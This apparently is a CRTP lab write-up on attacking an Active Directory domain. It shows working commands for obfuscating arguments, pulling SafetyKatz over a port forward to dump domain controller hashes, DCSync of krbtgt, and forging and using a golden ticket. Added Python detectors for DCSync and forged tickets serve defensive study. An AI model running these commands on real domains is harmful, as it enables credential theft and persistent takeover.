CRTP Lab 8

Task 1

Extract secrets from the domain controller of dollarcorp.

Since we have DA privileges, we can extract all the hashes stored on the DC.

Let's start a process as DA from an elevated cmd on the student machine.

# Run ArgSplit for asktgt
C:\Users\student372>cd \AD\Tools

C:\AD\Tools>ArgSplit.bat
[!] Argument Limit: 180 characters
[+] Enter a string: asktgt
set "z=t"
set "y=g"
set "x=t"
set "w=k"
set "v=s"
set "u=a"
set "Pwn=%u%%v%%w%%x%%y%%z%"
C:\AD\Tools>set "z=t"
C:\AD\Tools>set "y=g"
C:\AD\Tools>set "x=t"
C:\AD\Tools>set "w=k"
C:\AD\Tools>set "v=s"
C:\AD\Tools>set "u=a"
C:\AD\Tools>set "Pwn=%u%%v%%w%%x%%y%%z%"

# Get DA shell as svcadmin

C:\AD\Tools>C:\AD\Tools\Rubeus.exe %Pwn% /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

To dump hashes:

  • Copy Loader from student to dcorp-dc

  • Spawn cmd on dcorp-dc

  • Set up portforward to run SafetyKatz

  • Finally, run SafetyKatz

Note: "lsadump::lsa /patch" only gives us NTLM hashes, not AES keys.

# Copy Loader.exe to DC
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

# Spawn interactive shell
winrs -r:dcorp-dc cmd

# Set up port forwarding on dcorp-dc: 127.0.0.1:8080 on the DC forwards to the host serving SafetyKatz.exe over HTTP (172.16.100.72 here)
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72

# ArgSplit "lsadump::lsa"
# Dump hashes
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "%Pwn% /patch" "exit"

Let's use DCSync to dump both NTLM and AES hashes.

# ArgSplit to encode lsadump::dcsync
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:dcorp\krbtgt" "exit"
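From the defender's side, the DCSync above is visible on the DC as Security Event ID 4662: the subject exercises the replication extended rights (Control Access, mask 0x100) on the domain object. Replication is normal for domain controllers, so the useful check is "replication right used by something that is not a DC". The Python below is an added example written for this write-up, not part of the course or of any tool used in the lab. The 4662 records are constructed to carry only the fields the check needs; DCORP-DC, dcorp, svcadmin and student372 come from the lab, the replication-right GUIDs are the AD schema values, and the rest is assumed. It only works if "Audit Directory Service Access" is enabled and the domain object's SACL audits control-access rights.

```python
"""Flag DCSync-style replication requests in constructed Event ID 4662 records.

Added example for this CRTP write-up (not course material). Events are
dicts with the 4662 fields a SIEM would forward; they are constructed here.
"""

# Extended-right GUIDs that a DCSync request exercises (AD schema values).
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {
    DS_REPL_GET_CHANGES: "DS-Replication-Get-Changes",
    DS_REPL_GET_CHANGES_ALL: "DS-Replication-Get-Changes-All",
    DS_REPL_GET_CHANGES_FILTERED: "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # Access Mask bit for control-access (extended) rights


def replication_rights_in(properties: str) -> tuple:
    """Return the replication right names present in a 4662 Properties field.

    The field lists GUIDs in braces, in either case; match case-insensitively.
    """
    props = properties.lower()
    return tuple(name for guid, name in REPLICATION_RIGHTS.items() if guid in props)


def find_dcsync(events, dc_accounts):
    """Return (subject, rights) for 4662 events where a non-DC principal replicated.

    dc_accounts: names of DC computer accounts (e.g. "DCORP-DC$") that are
    expected to replicate; extend it with any legitimate sync accounts.
    """
    allowed = {name.lower() for name in dc_accounts}
    findings = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        # int() accepts the "0x..." form the event log uses
        if int(ev.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS == 0:
            continue
        rights = replication_rights_in(ev.get("Properties", ""))
        if not rights:
            continue
        if ev["SubjectUserName"].lower() in allowed:
            continue  # DC-to-DC replication is expected
        findings.append((f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}", rights))
    return findings


# Constructed sample records (not real log output).
SAMPLE_4662 = [
    # legitimate DC-to-DC replication
    {"EventID": 4662, "SubjectUserName": "DCORP-DC$", "SubjectDomainName": "dcorp",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # a user account pulling replication data: DCSync
    {"EventID": 4662, "SubjectUserName": "svcadmin", "SubjectDomainName": "dcorp",
     "AccessMask": "0x100",
     "Properties": "{1131F6AA-9C07-11D1-F79F-00C04FC2DCD2} {1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"},
    # control access on the User class GUID, not a replication right
    {"EventID": 4662, "SubjectUserName": "student372", "SubjectDomainName": "dcorp",
     "AccessMask": "0x100",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    # replication GUID present but only ReadProperty (0x10), not control access
    {"EventID": 4662, "SubjectUserName": "student372", "SubjectDomainName": "dcorp",
     "AccessMask": "0x10",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for subject, rights in find_dcsync(SAMPLE_4662, ["DCORP-DC$"]):
        print(f"DCSync suspected: {subject} used {', '.join(rights)}")
```

In a real estate the allow list also has to cover accounts that legitimately replicate (for example directory-sync service accounts), and a hit from a Domain Admin such as svcadmin is still worth an alert: DAs normally do not pull password data out of the directory.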

Task 2

Using the secrets of krbtgt account, create a Golden ticket.

Using the krbtgt hashes, we can now perform a Golden Ticket attack to maintain persistence.

# ArgSplit "golden"
# Forge TGT using Rubeus or SafetyKatz
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /printcmd

OR

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

With /printcmd, Rubeus prints the command needed to recreate the ticket.
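A golden ticket is forged offline, so no domain controller ever issues it: there is no 4768 (TGT requested) for it on any DC, and the first trace is a 4769 (service ticket requested) or a logon that presents the forged TGT. The ticket above is forged with /startoffset:0 /endin:600 /renewmax:10080, i.e. the default 10-hour lifetime and 7-day renewal, so lifetime checks on the ticket itself do not help; correlating 4769 against 4768 does. The Python below is an added example written for this write-up, not part of the course material. Its Kerberos records are constructed; the domain, DC and account names come from the lab, the client IPs and timestamps are assumed.

```python
"""Flag service-ticket requests (4769) with no preceding TGT request (4768).

Added example for this CRTP write-up (not course material). Events are
dicts with the relevant 4768/4769 fields; they are constructed here.
"""
from datetime import datetime, timedelta

DEFAULT_TGT_LIFETIME_HOURS = 10  # domain default "Maximum lifetime for user ticket"


def _account(name: str) -> str:
    """4769 logs user@REALM while 4768 logs the bare name; compare the bare name."""
    return name.split("@")[0].lower()


def _client_ip(addr: str) -> str:
    """The DC logs IPv4 clients as IPv4-mapped IPv6 (::ffff:a.b.c.d)."""
    return addr.replace("::ffff:", "")


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def find_tgs_without_tgt(events, lifetime_hours=DEFAULT_TGT_LIFETIME_HOURS):
    """Return (time, user, client_ip, service) for 4769s that no 4768 explains.

    A 4769 is explained if the same account from the same client got a TGT
    (4768) within the last `lifetime_hours`. Caveat: feed it the security
    logs of every DC in the domain, otherwise a TGT issued by another DC
    looks forged.
    """
    lifetime = timedelta(hours=lifetime_hours)
    issued = {}  # (account, client_ip) -> list of 4768 timestamps
    for ev in events:
        if ev["EventID"] == 4768:
            key = (_account(ev["TargetUserName"]), _client_ip(ev["IpAddress"]))
            issued.setdefault(key, []).append(_ts(ev["Time"]))
    hits = []
    for ev in events:
        if ev["EventID"] != 4769:
            continue
        when = _ts(ev["Time"])
        key = (_account(ev["TargetUserName"]), _client_ip(ev["IpAddress"]))
        if any(when - lifetime <= t <= when for t in issued.get(key, [])):
            continue
        hits.append((ev["Time"], ev["TargetUserName"].split("@")[0], key[1], ev["ServiceName"]))
    return hits


# Constructed sample records (not real log output).
SAMPLE_KERBEROS = [
    # normal flow: TGT, then a service ticket a few minutes later
    {"Time": "2022-11-12 10:00:00", "EventID": 4768, "TargetUserName": "student372",
     "IpAddress": "::ffff:172.16.100.1"},
    {"Time": "2022-11-12 10:05:00", "EventID": 4769,
     "TargetUserName": "student372@DOLLARCORP.MONEYCORP.LOCAL",
     "IpAddress": "::ffff:172.16.100.1", "ServiceName": "DCORP-DC$"},
    # forged TGT presented straight away: no 4768 for Administrator from this client
    {"Time": "2022-11-12 10:30:00", "EventID": 4769,
     "TargetUserName": "Administrator@DOLLARCORP.MONEYCORP.LOCAL",
     "IpAddress": "::ffff:172.16.100.72", "ServiceName": "DCORP-DC$"},
    # a TGT older than the ticket lifetime no longer explains a new 4769
    {"Time": "2022-11-11 20:00:00", "EventID": 4768, "TargetUserName": "svcadmin",
     "IpAddress": "::ffff:172.16.100.72"},
    {"Time": "2022-11-12 10:45:00", "EventID": 4769,
     "TargetUserName": "svcadmin@DOLLARCORP.MONEYCORP.LOCAL",
     "IpAddress": "::ffff:172.16.100.72",
     "ServiceName": "HTTP/dcorp-dc.dollarcorp.moneycorp.local"},
]

if __name__ == "__main__":
    for when, user, ip, service in find_tgs_without_tgt(SAMPLE_KERBEROS):
        print(f"{when}: {user} from {ip} requested {service} with no TGT on record")
```

The second hit shows why the lifetime parameter matters: a TGT that should have expired cannot explain a fresh service-ticket request, and a forged ticket renewed for up to 7 days never produces a renewal 4768 either. Tune lifetime_hours to the domain's actual Kerberos policy rather than the default.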

Task 3

Use the Golden ticket to (once again) get domain admin privileges from a machine.

# Use the printed command to import the ticket.
C:\AD\Tools\Loader.exe golden /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:"11/11/2022 6:33:55 AM" /minpassage:1 /logoncount:3335 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD

Finally, we can get a shell on dcorp-dc as Administrator:

C:\Users\student372>winrs -r:dcorp-dc cmd

C:\Users\Administrator>set username
set username
USERNAME=Administrator
C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC
